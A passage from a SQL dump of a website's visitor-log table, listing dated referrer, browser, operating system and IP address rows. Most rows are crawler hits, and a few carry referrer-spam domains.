Next','Windows','43.0.2442.1144','','77.120.125.23','000',2,0),(21290,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',1,0),(21291,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',1,0),(21292,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',4,0),(21293,'2018-02-12','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','146.185.223.111','000',1,0),(21294,'2018-02-12','https://zphiblgz.org','xpymep4','Unknown','Unknown','','146.185.223.111','000',1,0),(21295,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',3,0),(21296,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.223','000',1,0),(21297,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.72','000',2,0),(21298,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.24','000',3,0),(21299,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.198','000',1,0),(21300,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(21301,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',5,0),(21302,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.21','000',1,0),(21303,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',1,0),(21304,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.168','000',2,0),(21305,'2018-02-12','https://www.bing.com/','MSIE','Windows','11.0','','100.36.71.6','000',3,0),(21306,'2018-02-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(21307,'2018-02-12','https://www.google.com/','Chrome','Windows','63.0.3239.108','','167.102.244.1','000',2,0),(21308,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',2,0),(21309,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(21310,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',1,0),(21311,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(21312,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',1,0),(21313,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(21314,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',2,0),(21315,'2018-02-12','https://meriton.ru/','MSIE','Windows','6.0','','188.163.72.38','000',3,0),(21316,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(21317,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',1,0),(21318,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.202','000',3,0),(21319,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',1,0),(21320,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.117','000',1,0),(21321,'2018-02-12','https://nakozhe.com/','Opera','Windows','6.01','','188.163.72.38','000',2,0),(21322,'2018-02-12','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(21323,'2018-02-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(21324,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.243','000',1,0),(21325,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.212','000',1,0),(21326,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.36','000',1,0),(21327,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.22','000',2,0),(21328,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.116','000',1,0),(21329,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(21330,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',2,0),(21331,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(21332,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',1,0),(21333,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',1,0),(21334,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(21335,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.219','000',1,0),(21336,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.219','000',2,0),(21337,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',1,0),(21338,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',1,0),(21339,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',3,0),(21340,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',1,0),(21341,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',1,0),(21342,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',1,0),(21343,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(21344,'2018-02-12','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(21345,'2018-02-12','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','71.121.235.184','000',3,0),(21346,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.10','000',1,0),(21347,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(21348,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',2,0),(21349,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.112','000',2,0),(21350,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',4,0),(21351,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',2,0),(21352,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(21353,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.128','000',2,0),(21354,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.14','000',1,0),(21355,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.245','000',2,0),(21356,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.71','000',2,0),(21357,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.88','000',1,0),(21358,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',1,0),(21359,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(21360,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.120','000',2,0),(21361,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',1,0),(21362,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(21363,'2018-02-12','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.204.170','000',2,0),(21364,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',2,0),(21365,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',3,0),(21366,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',2,0),(21367,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.166','000',2,0),(21368,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.24','000',2,0),(21369,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.215','000',1,0),(21370,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.160','000',3,0),(21371,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.29','000',1,0),(21372,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',2,0),(21373,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(21374,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.195','000',2,0),(21375,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.197','000',1,0),(21376,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.34','000',1,0),(21377,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.149','000',1,0),(21378,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(21379,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(21380,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(21381,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',3,0),(21382,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(21383,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(21384,'2018-02-12','http://chatroulette.life/','Opera','Windows','7.0','','46.119.123.218','000',2,0),(21385,'2018-02-12','https://zphiblgz.org','Firefox','Windows','40.1','','152.169.230.184','000',2,0),(21386,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',3,0),(21387,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',1,0),(21388,'2018-02-12','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',6,0),(21389,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',2,0),(21390,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.251','000',3,0),(21391,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.19','000',2,0),(21392,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(21393,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',1,0),(21394,'2018-02-12','https://onlywood.ru/catalog/lumber.html','MSIE','Windows','6.0','','178.137.162.218','000',1,0),(21395,'2018-02-12','http://drugs-no-rx.info/','Opera','Windows','8.50','','46.119.123.218','000',3,0),(21396,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',4,0),(21397,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',2,0),(21398,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.206','000',3,0),(21399,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',1,0),(21400,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(21401,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.242','000',1,0),(21402,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.230','000',1,0),(21403,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.47','000',2,0),(21404,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.178','000',2,0),(21405,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.65','000',1,0),(21406,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',3,0),(21407,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',2,0),(21408,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(21409,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(21410,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.241','000',1,0),(21411,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',2,0),(21412,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',1,0),(21413,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',4,0),(21414,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',1,0),(21415,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',1,0),(21416,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(21417,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.207','000',2,0),(21418,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',2,0),(21419,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.218','000',3,0),(21420,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.212','000',1,0),(21421,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(21422,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',4,0),(21423,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',1,0),(21424,'2018-02-12','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',2,0),(21425,'2018-02-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(21426,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',1,0),(21427,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',1,0),(21428,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(21429,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(21430,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.113','000',1,0),(21431,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.210','000',2,0),(21432,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.121','000',1,0),(21433,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',2,0),(21434,'2018-02-12','https://zphiblgz.org','Firefox','Windows','40.1','','118.200.249.25','000',2,0),(21435,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(21436,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(21437,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',2,0),(21438,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',1,0),(21439,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(21440,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(21441,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',1,0),(21442,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',3,0),(21443,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.120','000',1,0),(21444,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',1,0),(21445,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(21446,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',2,0),(21447,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.98','000',1,0),(21448,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(21449,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',1,0),(21450,'2018-02-12','https://zphiblgz.org','Edge','Windows','14.14393','','68.134.9.53','000',6,0),(21451,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',2,0),(21452,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(21453,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.217','000',1,0),(21454,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(21455,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.242','000',3,0),(21456,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.26','000',2,0),(21457,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.104','000',1,0),(21458,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.216','000',1,0),(21459,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',1,0),(21460,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',1,0),(21461,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.207','000',1,0),(21462,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(21463,'2018-02-12','https://www.google.com/','Chrome','Windows','63.0.3239.132','','71.179.11.101','000',3,0),(21464,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',1,0),(21465,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',2,0),(21466,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',1,0),(21467,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(21468,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.6','000',1,0),(21469,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.96','000',1,0),(21470,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',1,0),(21471,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.141','000',1,0),(21472,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',2,0),(21473,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',1,0),(21474,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(21475,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(21476,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',2,0),(21477,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',1,0),(21478,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',1,0),(21479,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(21480,'2018-02-12','http://healgastro.com/','Unknown','Unknown','Unknown','','188.163.72.38','000',2,0),(21481,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',2,0),(21482,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',1,0),(21483,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',2,0),(21484,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.112','000',3,0),(21485,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',1,0),(21486,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(21487,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',1,0),(21488,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',4,0),(21489,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',1,0),(21490,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',1,0),(21491,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',1,0),(21492,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',2,0),(21493,'2018-02-13','https://zphiblgz.org','Firefox','Windows','40.1','','85.29.227.93','000',2,0),(21494,'2018-02-13','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(21495,'2018-02-13','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.27','000',1,0),(21496,'2018-02-13','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(21497,'2018-02-13','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(21498,'2018-02-13','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(21499,'2018-02-13','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.27','000',1,0),(21500,'2018-02-13','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(21501,'2018-02-13','https://pills24h.com/buy-celebrex-online-without-prescription/','Opera','Windows','9.01','','178.137.162.218','000',1,0),(21502,'2018-02-13','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(21503,'2018-02-13','http://electronic-component.org/','MSIE','Windows','6.0','','46.118.116.121','000',4,0),(21504,'2018-02-13','http://gazel-72.ru/','MSIE','Windows','6.0','','178.137.162.218','000',1,0),(21505,'2018-02-13','http://all-news.kz/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(21506,'2018-02-13','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.18','000',1,0),(21507,'2018-02-13','https://zphiblgz.org','Firefox','Windows','40.1','','168.194.16.196','000',2,0),(21508,'2018-02-13','https://zphiblgz.org','Opera Next','Windows','50.0.2762.58','','192.198.80.227','000',2,0),(21509,'2018-02-13','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','50.225.39.84','000',7,0),(21510,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',3,0),(21511,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',1,0),(21512,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',2,0),(21513,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',2,0),(21514,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',3,0),(21515,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',4,0),(21516,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',2,0),(21517,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',2,0),(21518,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',2,0),(21519,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',5,0),(21520,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',1,0),(21521,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',3,0),(21522,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(21523,'2018-02-13','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.149','000',2,0),(21524,'2018-02-13','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.125','000',1,0),(21525,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',3,0),(21526,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',2,0),(21527,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.117','000',3,0),(21528,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',1,0),(21529,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',1,0),(21530,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.133','000',1,0),(21531,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(21532,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.227','000',3,0),(21533,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',2,0),(21534,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',2,0),(21535,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',1,0),(21536,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',1,0),(21537,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.164','000',1,0),(21538,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',1,0),(21539,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',1,0),(21540,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(21541,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',4,0),(21542,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',4,0),(21543,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',2,0),(21544,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',3,0),(21545,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',2,0),(21546,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',3,0),(21547,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',2,0),(21548,'2018-02-13','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.150','000',1,0),(21549,'2018-02-13','https://zphiblgz.org/history/','Chrome','Linux','41.0.2272.118','','66.102.7.146','000',1,0),(21550,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.55','000',3,0),(21551,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.195','000',4,0),(21552,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',1,0),(21553,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',1,0),(21554,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.49','000',2,0),(21555,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.193','000',1,0),(21556,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.91','000',1,0),(21557,'2018-02-13','https://zphiblgz.org','Firefox','Windows','32.0','','81.120.65.55','000',1,0),(21558,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.194','000',1,0),(21559,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.89','000',2,0),(21560,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.117','000',1,0),(21561,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.23','000',1,0),(21562,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.89','000',1,0),(21563,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',1,0),(21564,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.205','000',2,0),(21565,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',3,0),(21566,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',1,0),(21567,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(21568,'2018-02-13','http://kinoduh.ru/','MSIE','Unknown','6.0','','46.118.116.121','000',3,0),(21569,'2018-02-13','https://cryptoswap.biz/','MSIE','Windows','5.5','','46.118.116.121','000',2,0),(21570,'2018-02-13','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(21571,'2018-02-13','https://zphiblgz.org','MSIE','Windows','6.